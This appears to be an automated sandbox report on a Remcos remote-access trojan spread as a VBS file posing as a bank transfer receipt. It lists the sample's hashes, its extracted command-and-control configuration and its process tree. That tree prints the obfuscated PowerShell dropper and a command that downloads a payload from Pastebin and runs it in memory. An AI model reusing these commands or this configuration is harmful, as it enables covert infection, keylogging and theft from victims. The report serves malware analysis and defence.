remcos | 13d68dbe8b6307b80456e6ac0f47cbef9cf2c1f99131894373145b1c8dfb66bc

General

Target

enviado comprobante detallado Aviso de Transferencia Realizada en cuenta empresarial.vbs
Size

149KB
MD5

26aeb38c880f8d8e02878107abdc2f54
SHA1

257adf0cefde925b9426500bc43f0e87501e1894
SHA256

13d68dbe8b6307b80456e6ac0f47cbef9cf2c1f99131894373145b1c8dfb66bc
SHA512

27a81426dc8175d9e9002149209312cf567323963d0c4397c56e7fecec0f4dbeb967c4d16412f5bc61b8d2726ec20849440e5d7b8e1202988bbed1b3fe7f2a74
SSDEEP

1536:8Kd99CObiNCocEW1aJK66n5yhtW0/5JpWn4cNIg0BfbUZlu9gISsR3MQF6a:8Kdo9JK6X/vcmg0Bfcq

Score

10^/10

remcos milojueves1 rat

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://pastebin.com/raw/fNYFJXVy

Extracted

Family

remcos

Botnet

MiloJueves1

C2

contificoseguro.con-ip.com:2500

Attributes

audio_folder
MicRecords
audio_record_time
5
connect_delay
0
connect_interval
1
copy_file
remcos.exe
copy_folder
Remcos
delete_file
false
hide_file
false
hide_keylog_file
true
install_flag
false
keylog_crypt
false
keylog_file
logslmilo.dat
keylog_flag
false
keylog_folder
logslivemilo1
mouse_option
false
mutex
Rmcau1milo1-AZN4WS
screenshot_crypt
false
screenshot_flag
false
screenshot_folder
Screenshots
screenshot_path
%AppData%
screenshot_time
10
startup_value
Remcos
take_screenshot_option
false
take_screenshot_time
5

Signatures

Remcos
Remcos is a closed-source remote control and surveillance software.
rat remcos

Blocklisted process makes network request 3 IoCs

flow	pid	Process
2	3572	powershell.exe
4	3572	powershell.exe
6	3572	powershell.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 3572 set thread context of 4800	3572	powershell.exe	72

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 9 IoCs

pid	Process
4876	powershell.exe
4876	powershell.exe
2248	powershell.exe
4876	powershell.exe
2248	powershell.exe
2248	powershell.exe
3572	powershell.exe
3572	powershell.exe
3572	powershell.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
4800	InstallUtil.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

description	pid	Process
Token: SeDebugPrivilege	4876	powershell.exe
Token: SeDebugPrivilege	2248	powershell.exe
Token: SeDebugPrivilege	3572	powershell.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
4800	InstallUtil.exe

Suspicious use of WriteProcessMemory 18 IoCs

description	pid	Process	procid_target
PID 1464 wrote to memory of 4876	1464	WScript.exe	66
PID 1464 wrote to memory of 4876	1464	WScript.exe	66
PID 1464 wrote to memory of 2248	1464	WScript.exe	69
PID 1464 wrote to memory of 2248	1464	WScript.exe	69
PID 2248 wrote to memory of 3572	2248	powershell.exe	71
PID 2248 wrote to memory of 3572	2248	powershell.exe	71
PID 3572 wrote to memory of 4800	3572	powershell.exe	72
PID 3572 wrote to memory of 4800	3572	powershell.exe	72
PID 3572 wrote to memory of 4800	3572	powershell.exe	72
PID 3572 wrote to memory of 4800	3572	powershell.exe	72
PID 3572 wrote to memory of 4800	3572	powershell.exe	72
PID 3572 wrote to memory of 4800	3572	powershell.exe	72
PID 3572 wrote to memory of 4800	3572	powershell.exe	72
PID 3572 wrote to memory of 4800	3572	powershell.exe	72
PID 3572 wrote to memory of 4800	3572	powershell.exe	72
PID 3572 wrote to memory of 4800	3572	powershell.exe	72
PID 3572 wrote to memory of 4800	3572	powershell.exe	72
PID 3572 wrote to memory of 4800	3572	powershell.exe	72

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\enviado comprobante detallado Aviso de Transferencia Realizada en cuenta empresarial.vbs"
1⤵
- Suspicious use of WriteProcessMemory
PID:1464
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Copy-Item -Path *.vbs -Destination C:\Windows\Temp\edDWr.vbs
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4876
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $iUqm = 'JABpAEcAVAB4AFIAIAA9ACAAJwBSAEEASABMAEgAJwA7AFsAQgB5A***QAZQBbAF0AXQAgACQAUwByAEIARQB1ACAAPQAgAFsAcwB5A***MAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhA***MAZQA2ADQAUwB0A***IAaQBuAGcAKAAgACgATgBlA***cALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuA***QAKQAuAEQAbwB3AG4AbABvAGEAZABTA***QAcgBpAG4AZwAoACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlA***QALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvA***cAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoA***QAdABwA***MAOgAvAC8AcABhA***MAdABlAGIAaQBuAC4AYwBvAG0ALwByAGEAdwAvAGYATgBZAEYASgBYAFYAeQAnACkAIAApACAAKQA7AFsAcwB5A***MAdABlAG0ALgBBA***AAcABEAG8AbQBhAGkAbgBdADoAOgBDA***UAcgByAGUAbgB0AEQAbwBtAGEAaQBuAC4ATABvAGEAZAAoACQAUwByAEIARQB1ACkALgB***AGUAdABUA***kAcABlACgAJwBDAGQAVwBEAGQAQgAuAEQASwBlAFMAdgBsACcAKQAuAEcAZQB0AE0AZQB0AGgAbwBkACgAJwBOAG4ASQBhAFUAcQAnACkALgBJAG4AdgBvAGsAZQAoACQAbgB1AGwAbAAsACAAWwBvAGIAagBlAGMAdABbAF0AXQAgACgAJwAwAC8AegBxAG8AZQBMAC8AZAAvAGUAZQAuAGUAdABzAGEAcAAvAC8AOgBzA***AAdAB0AGgAJwAgACwAIAAkAGkARwBUA***gAUgAgACwAIAAnAEMAYQBsAGUAbgBkAGEAcgBpAG8AMgAnACwAIAAnADAAJwAsACAAJwAxACcALAAgACcAJwAgACkAKQA7AA==';$pvNxls = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $iUqm.replace('***','H') ) );$pvNxls = $pvNxls.replace('RAHLH', 'C:\Users\Admin\AppData\Local\Temp\enviado comprobante detallado Aviso de Transferencia Realizada en cuenta empresarial.vbs');powershell -command $pvNxls
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2248
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$iGTxR = 'C:\Users\Admin\AppData\Local\Temp\enviado comprobante detallado Aviso de Transferencia Realizada en cuenta empresarial.vbs';[Byte[]] $SrBEu = [system.Convert]::FromBase64String( (New-Object Net.WebClient).DownloadString( (New-Object Net.WebClient).DownloadString('https://pastebin.com/raw/fNYFJXVy') ) );[system.AppDomain]::CurrentDomain.Load($SrBEu).GetType('CdWDdB.DKeSvl').GetMethod('NnIaUq').Invoke($null, [object[]] ('0/zqoeL/d/ee.etsap//:sptth' , $iGTxR , 'Calendario2', '0', '1', '' ));"
    3⤵
    - Blocklisted process makes network request
    - Suspicious use of SetThreadContext
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:3572
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
      4⤵
      Suspicious behavior: GetForegroundWindowSpam
      Suspicious use of SetWindowsHookEx
      PID:4800

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Web Service

1

T1102

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Command and Control

Web Service

1

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
17286868c0a043ae5d2ff5798b6a3163

SHA1
b83b23cd57c7fb2c937f5bc18aeb7ddc955b5401

SHA256
40321e18ed0b9eb7e3bc937d3e207ea2039ff45267483ddb4a51f7974475dac6

SHA512
e15c11982c0569a389a7dbd0889edd1ef9a8ffb21c0e8ffadebc10e1353f4485524b18ca8e041c66c98d05fb984544da122755e6c2a25728453aeaf4175bdee1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
d83d3033b5cc30d53c297a432bd778b1

SHA1
49abf9ad72f83f22d7d8bc9cdd3344d2055e8222

SHA256
3a6766da8cc20fcf67d14aef5f23fcaccda913c9e5568b508ced3a51158600df

SHA512
45eb2c2f038e09e282ce9cf53d82a50368125d409b2e9cced2c786e9e7314d15c24eb9480412bbe3f3902eefd59e21f97c41d33255e70dc77bed674f097b6d94

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
3ec7bed03e4f68025f629c03a04012e1

SHA1
f179fa1b0ffe065e946f169fc3d32c30f6025a9f

SHA256
c825409817514f65bf5e4a436fc72879fd70e76347f77d1b1f5ada8e99d26833

SHA512
4d9e5e050ddb316146c52013e03228a8389febc74f8f97ed299e43bd67d0aec5d7647ef5742c27b67a468f08b70b8b6cb71e8c94547645491f07ac997c9e2c92

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_inoypicc.e5o.ps1

Filesize
1B

MD5
c4ca4238a0b923820dcc509a6f75849b

SHA1
356a192b7913b04c54574d18c28d46e6395428ab

SHA256
6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

SHA512
4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

Download Submit
memory/2248-170-0x0000018EA83D0000-0x0000018EA83E0000-memory.dmp

Filesize
64KB

Download
memory/2248-174-0x0000018EA83D0000-0x0000018EA83E0000-memory.dmp

Filesize
64KB

Download
memory/3572-199-0x000001661A8A0000-0x000001661A8AA000-memory.dmp

Filesize
40KB

Download
memory/3572-198-0x0000016602370000-0x0000016602380000-memory.dmp

Filesize
64KB

Download
memory/3572-197-0x000001661A840000-0x000001661A84A000-memory.dmp

Filesize
40KB

Download
memory/3572-194-0x0000016602370000-0x0000016602380000-memory.dmp

Filesize
64KB

Download
memory/3572-193-0x0000016602370000-0x0000016602380000-memory.dmp

Filesize
64KB

Download
memory/4800-203-0x0000000000400000-0x0000000000480000-memory.dmp

Filesize
512KB

Download
memory/4800-222-0x0000000000400000-0x0000000000480000-memory.dmp

Filesize
512KB

Download
memory/4800-230-0x0000000000400000-0x0000000000480000-memory.dmp

Filesize
512KB

Download
memory/4800-229-0x0000000000400000-0x0000000000480000-memory.dmp

Filesize
512KB

Download
memory/4800-228-0x0000000000400000-0x0000000000480000-memory.dmp

Filesize
512KB

Download
memory/4800-227-0x0000000000400000-0x0000000000480000-memory.dmp

Filesize
512KB

Download
memory/4800-200-0x0000000000400000-0x0000000000480000-memory.dmp

Filesize
512KB

Download
memory/4800-226-0x0000000000400000-0x0000000000480000-memory.dmp

Filesize
512KB

Download
memory/4800-225-0x0000000000400000-0x0000000000480000-memory.dmp

Filesize
512KB

Download
memory/4800-207-0x0000000000400000-0x0000000000480000-memory.dmp

Filesize
512KB

Download
memory/4800-208-0x0000000000400000-0x0000000000480000-memory.dmp

Filesize
512KB

Download
memory/4800-210-0x0000000000400000-0x0000000000480000-memory.dmp

Filesize
512KB

Download
memory/4800-211-0x0000000000400000-0x0000000000480000-memory.dmp

Filesize
512KB

Download
memory/4800-212-0x0000000000400000-0x0000000000480000-memory.dmp

Filesize
512KB

Download
memory/4800-213-0x0000000000400000-0x0000000000480000-memory.dmp

Filesize
512KB

Download
memory/4800-214-0x0000000000400000-0x0000000000480000-memory.dmp

Filesize
512KB

Download
memory/4800-215-0x0000000000400000-0x0000000000480000-memory.dmp

Filesize
512KB

Download
memory/4800-220-0x0000000000400000-0x0000000000480000-memory.dmp

Filesize
512KB

Download
memory/4800-221-0x0000000000400000-0x0000000000480000-memory.dmp

Filesize
512KB

Download
memory/4800-224-0x0000000000400000-0x0000000000480000-memory.dmp

Filesize
512KB

Download
memory/4800-223-0x0000000000400000-0x0000000000480000-memory.dmp

Filesize
512KB

Download
memory/4876-138-0x00000181DCE20000-0x00000181DCE96000-memory.dmp

Filesize
472KB

Download
memory/4876-126-0x00000181C3C90000-0x00000181C3CA0000-memory.dmp

Filesize
64KB

Download
memory/4876-125-0x00000181DC160000-0x00000181DC1E2000-memory.dmp

Filesize
520KB

Download
memory/4876-128-0x00000181DC0D0000-0x00000181DC0F2000-memory.dmp

Filesize
136KB

Download
memory/4876-129-0x00000181DC0C0000-0x00000181DC0D0000-memory.dmp

Filesize
64KB

Download
memory/4876-130-0x00000181DC0C0000-0x00000181DC0D0000-memory.dmp

Filesize
64KB

Download
memory/4876-131-0x00000181DCC90000-0x00000181DCD92000-memory.dmp

Filesize
1.0MB

Download

Analysis

Sharing

General

Malware Config

Extracted

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads